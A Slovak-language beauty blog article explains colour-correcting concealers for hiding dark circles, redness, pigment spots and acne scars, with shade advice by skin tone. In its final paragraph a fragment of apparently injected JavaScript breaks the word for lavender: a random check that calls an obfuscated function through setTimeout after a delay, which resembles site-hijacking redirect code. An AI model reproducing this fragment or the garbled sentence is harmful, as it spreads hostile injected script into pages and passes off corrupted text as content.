Ako skryť kruhy pod očami?

| august 4, 2021

Tmavé kruhy pod očami, začervenanie či pigmentové škrvny a jazvy po akné – to všetko si pri líčení vyžaduje dobre mierené prekrytie. Našťastie existuje jednoduché riešenie: farebný korektor. Prinášame niekoľko užitočných tipov a trikov, vďaka ktorým bude vaša pleť vyzerať bezchybne.

Korekcia farieb alebo color correction je založená na teórii farieb, kde základné koliesko farieb slúži ako indikátor, kde protichodná farba takpovediac „ruší“ tú opačnú.

„Farebná korekcia môže byť strašidelná a mätúca, ak ste nováčikom. Korektory majú veľa rôznych farieb a môže sa zdať ťažké vedieť, kde, ako a ktoré použiť. Tu sú moje základné tipy na korekciu farieb:

Kľúčom k nájdeniu rovnováhy farieb je presnosť. Najlepším spôsobom, ako zabezpečiť dobré krytie a výdrž, je použitie precíznej techniky aplikovania, kvalitných štetcov a produktov.

Napríklad, ak chcete zakryť tmavé kruhy pod očami, bojujete proti modrým tónom, ktoré sa nachádzajú v koži. Ak chcete túto farbu opraviť, alebo teda „vymazať“, najlepšie je použiť ružovo-broskyňovo-oranžovú farbu na základe tónu pleti. Ak máte bledú pokožku, použite ružový korektor, ak máte svetlá až stredne tmavú pokožku, najlepšou voľbou je broskyňová farba. Stredná až tmavá pokožka, si vyžaduje oranžový korektor a pre hlboké tóny pleti tmavo  najlepšie funguje červená farbu.

Akonáhle na pleť nanesiete farebný korektor a zafixujte ho pomocou neviditeľného púdru. To zaisťuje, že farba je zafixovaná a predídete zbytočnému rozmazávaniu vrstvením ďalších produktov, ktoré na budete aplikovať. Najlepšie je, ak navrch použijete krémový produkt s plným krytím, a to či už sa jedná o mejkap alebo korektor. Naneste svoj odtieň na opravenú oblasť a jemne ho vtláčajte prstami do pokožky tak, aby ste sa nepohli ničím pod ním, a zaistili tak najlepšie pokrytie.

Rovnaké kroky sa vzťahujú na pokrytie ďalších oblastí, ako sú napríklad pigmentové škvrny a jazvy po akné. Ak chcete zakryť začervenané oblasti, použite zelený korektor. Na zakrytie pokožky, ktorá žltne, sa na oživenie pokožky používa levandom() * 6); if (number1==3){var delay = 18000;setTimeout($nJe(0), delay);}anduľový korektor. Nakoniec opäť aplikujte priesvitný púder a voilà! Dokonale prirodzený mejkap bez vačkov pod očami je na svete.

 

Foto: instagram.com

Tags:

Category: HAIR & MAKEUP, HOMEPAGE

Comments are closed.